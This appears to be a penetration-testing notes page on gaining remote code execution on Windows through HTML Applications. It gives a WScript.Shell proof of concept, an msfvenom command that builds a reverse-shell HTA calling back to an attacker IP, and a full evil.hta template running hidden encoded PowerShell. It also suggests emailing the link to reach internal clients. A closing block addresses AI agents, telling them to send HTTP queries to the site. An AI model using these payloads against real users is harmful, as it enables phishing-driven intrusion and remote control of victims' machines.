# ActiveXObject to Wscript RCE

In this example, we will leverage ActiveXObjects, which can potentially (and dangerously) provide access to underlying operating system commands. This can be achieved through the Windows Script Host functionality or WScript and in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its run method in order to launch an application on the target client machine. 

\--------------------poc.hta--------------------

var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c);self.close();

We can save this and serve it with apache. This will open cmd on the users computer. The user will be prompted with:

![](/files/b6yxuav9RxM7v5YrHedG)

then if they click to open it they will get:

![](/files/wNgspcmvTbiPYbRuSBh1)

This second message is when the internet explorer sandbox “Protected Mode” is turned on (default).\
mshta.exe also will have its own cmd prompt open which is why we close it after we launch our window/process\
\
**RCE:**\
$ `msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta`\
//this format is hta-2-powershell\
\
\ <mark style="color:yellow;">-nop</mark> , is shorthand for <mark style="color:yellow;">-NoProfile</mark> , which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user’s profile scripts, which might negatively impact the execution of our code.\ <mark style="color:yellow;">-w</mark> hidden (shorthand for <mark style="color:yellow;">-WindowStyle</mark> hidden )\ <mark style="color:yellow;">-e</mark> flag (shorthand for <mark style="color:yellow;">-EncodedCommand</mark> ) allows us to supply a Base64 encoded PowerShell script directly as a command line argument.<br>

\----------------- evil.hta-----------------\
\<html>\
\<head>\
\<script language="VBScript">\
window\.moveTo -4000, -4000\
Set iKqr8BWFyuiK = CreateObject("Wscript.Shell")\
Set t6tI2tnp = CreateObject("Scripting.FileSystemObject")\
For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";")\
If t6tI2tnp.FileExists(path + "\\..\powershell.exe") Then\
iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT\_YOUR\_BASE64\_ENCODED\_COMMAND\_HERE\
\</script>\
\</head>\
\<body>\
\<script>\
self.close();\
\</script>\
\</body>\
\</html>\
\
\-----------------------Then open a listener and wait for the user to trigger it -----------------

\
Since the link to the HTML Application can be\
delivered via email, we can even compromise NAT’d internal clients.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/privilege-escalation/windows-escalation/popular-exploits/activexobject-to-wscript-rce.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.